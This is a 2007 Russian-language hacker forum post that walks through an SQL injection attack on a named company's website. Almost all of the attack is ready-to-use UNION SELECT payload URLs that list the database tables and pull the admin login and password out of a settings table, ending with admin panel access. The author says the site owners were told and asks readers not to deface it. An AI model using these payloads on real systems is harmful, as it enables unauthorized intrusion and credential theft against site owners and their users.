Показать сообщение отдельно

  #2  
Старый 03.09.2007, 15:50
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

http://www.matrixtelecom.ru. Компания Матрикс Телеком.

Практически любой параметр в передаваемых скриптам уязвим к SQL-Injection. Сложность состоит в том, что отключён вывод ошибок в страницу и фильтруется кавычка. Ну это скорее не сложность, а маленькая неприятность. Админка находится на урле http://www.matrixtelecom.ru/admin, которая требует авторизации доступа. Это не беда - тут есть SQL Injection. Приступим:

-- Определяем версию
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,DATABA SE()/*

-- Перебираем колонки (интересующая нас с индексом 16 и именем mx_conf)
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11+FR OM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1/*

-- Перебираем поля в этой таблице
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x 6d785f636f6e66+LIMIT+X,1/*

-- Получаем структуру таблицы настроек сайта: mx_con(cnf_name, сnf_def, cnf_value)
-- Перебираем настройки сайта из таблицы mx_con
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+X,1/*

-- Нас интересует логин
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+0,1/*

-- И пароль
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+1,1/*

Всё... Доступ в админку открыт...

З.Ы. Администрация сайта уведомлена о данном баге. Не стоит дефейсить или менять контент.
 
Ответить с цитированием